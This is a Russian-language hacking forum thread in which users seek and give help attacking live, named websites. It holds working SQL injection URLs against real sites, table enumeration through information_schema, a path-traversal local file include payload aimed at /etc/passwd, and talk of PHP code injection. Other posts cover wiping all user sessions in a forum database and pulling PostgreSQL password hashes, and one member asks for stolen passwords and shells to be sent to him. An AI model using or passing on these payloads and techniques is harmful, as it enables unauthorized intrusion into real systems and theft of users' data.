Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Code:
    http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,3,4,5--
    но

    Code:
    http://www.fshsh.org/lajmi.php?id=-47+union+select+1,version(),3,4,5--
    ничего не выводит. unhex(hex(version())) и др. кодирование не помогает.. Как раскрутить ее?
     
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 ПаВлУшКа:

    http://www.fshsh.org/lajmi.php?id=-47+union+select+1,2,@@version,4,5--
     
  4. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Pashkela, а дальше? Как узнать имена таблиц, колонок?
     
  5. Doom123

    Doom123 Elder - Старейшина

    Joined:
    11 Nov 2006
    Messages:
    749
    Likes Received:
    244
    Reputations:
    22
    через information_schema пробуй =)
     
  6. ПаВлУшКа

    ПаВлУшКа New Member

    Joined:
    7 Feb 2009
    Messages:
    24
    Likes Received:
    4
    Reputations:
    0
    Doom123, естественно через нее, вот только не выводится ничего..
     
  7. navigat0r

    navigat0r Member

    Joined:
    15 Mar 2009
    Messages:
    83
    Likes Received:
    54
    Reputations:
    -2
    что можно дальше с этим сделать?
    Но можно воспользоваться аналогом "more that 1 row".
    http://www.e3e5.com/author.php?id=-1018))+union+select+null,null,null,null,null,null, null,null,null,null,null,null,null,null,null,null+ from+author+where+((1=(select+1,2)+
     
    1 person likes this.
  8. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 ПаВлУшКа:

    А дальше включать мосг, подумав решить, что ЭТА скуля тупая и нам не нужна и найти на этом же сайте другую, ХОРОШУЮ скулю:

    Code:
    http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,version()
    

    Code:
    http://www.fshsh.org/kalendaridetaj.php?id=-4+union+select+1,2,3,4,table_name+from+information_schema.tables
    
     
  9. Aleksandeer

    Aleksandeer New Member

    Joined:
    27 Mar 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Подскажите:
    Есть форма авторизации там есть
    <select id="number" name="number">
    <OPTION value="aa">1</OPTION>
    <OPTION value="bb">2</OPTION>
    <OPTION value="cc">3</OPTION>
    <OPTION value="dd">4</OPTION>
    </select>
    и кнопка отправки, данные форма передаёт файлу login.php
    после изменения в форме value="aa" например на value="aa2" то после отправки запроса выдаёт ошибку примерно такого содержания
    Code:
    Warning: require_once(configaa2.php) [function.require-once]: failed to open stream: No such file or directory in /var/www/site/htdocs/login.php on line 103  Fatal error: require_once() [function.require]: Failed opening required 'configaa2.php' (include_path='.:/usr/share/php5:/usr/share/php') in /var/www/site/htdocs/login.php on line 103
    Подскажите что можно тут выполнить?например чтонибудь связаное с инклудом другого файла

    p.s извеняйте за обьяснение, как смог(
     
  10. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    По идее локальный инклуд, а как реализовать - хз, смотреть надо. Но в личку просьба пароли и прочее не кидать!
     
  11. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    Дорогие друзья!
    Т.к. уважаемый товарищ Pashkela официально отказался от приема важной информации в ЛС, которой вы наверное безудержно хотите поделиться, я вас грандиозно обрадую! Теперь у вас есть неповторимая нигде возможность отправить все пассы\шеллы и т.п. мне в личку!
    З.Ы
    по возможности, оформляйте все красиво и удобно, чтобы мне не приходилось искать на всяких сайтах "бесполезные инклуды"

    С любовью, ваш Iceangel_ .



    P.S.
    Дабы сообщение не входило в разряд "флуда", дам пару советов ))
    2 Aleksandeer
    ну а что тебе мешает попробовать инклуднуть что-нибудь?
    2 navigat0r
    наверное это можно хекноть
     
    4 people like this.
  12. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Как обнулить сессии в бд?
    То есть чтобы всех юзеров выкинуло в тупую, но надо через БД это все сделать

    Двиг SMF
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    а можно ссылку посмотреть?
    может там можно произвести php-injection по принципу закрыть функцию подключения конфига ");" и вставить свой рнр код...
     
    _________________________
    1 person likes this.
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    пробуй value="/../../../../../etc/passwd%00"

    если магик квотес офф - то кульно будет
     
    1 person likes this.
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Вопрос по PostgreSQL иньекцию

    Вывожу из базы pg_user логины потом пытаюсь вывести пароли а там звездочки! что делать? или звездочки это существенно в PostgreSQL и раскрыть их незя?
     
    1 person likes this.
  16. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Это норма для PostgreSQL...
     
  17. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Объясните winstrool и попугаю почему они сморозили херню=\
    jokester, давай!
     
  18. bug1z

    bug1z Member

    Joined:
    7 May 2009
    Messages:
    61
    Likes Received:
    18
    Reputations:
    1
    Винстул,попугай, а где вы видите форму ввода о.О
    Там вообщето менюха позволяющая выбрать либо 1 либо 2 либо 3...
     
    #7138 bug1z, 18 May 2009
    Last edited: 18 May 2009
  19. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    щито?



    Чтоо? Он же сам показал ,что форма ввода там..

     
    #7139 попугай, 18 May 2009
    Last edited: 18 May 2009
  20. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    yes sir!!! :)

    По приказу вышестоящего начальства объясняю:

    При передачи значения /../../../../lololo в переменную value сценарий попытается включить файл
    config/../../../../lololo.php. Даже если расширение удастся отбросить нулбайтом или слешами, то в 90% случаев инклуд не пролезет если папки config не существует.
    Хотя , я где-то читал, что при какой-то конфигурации PHP+Linux может пролезть и при несуществующей папке. В винде будет работать на ура , независимо от наличия папки.
    Это если чесно совсем не понял. Если можно покажи пример того, что ты хотел сделать и пример кода при котором это может сработать

    diznt
    В этой таблице нет паролей, они хранятся в pg_shadow но на её прочтения у тебя 99% не хватит прав
     
    #7140 Kakoytoxaker, 18 May 2009
    Last edited: 18 May 2009
Thread Status:
Not open for further replies.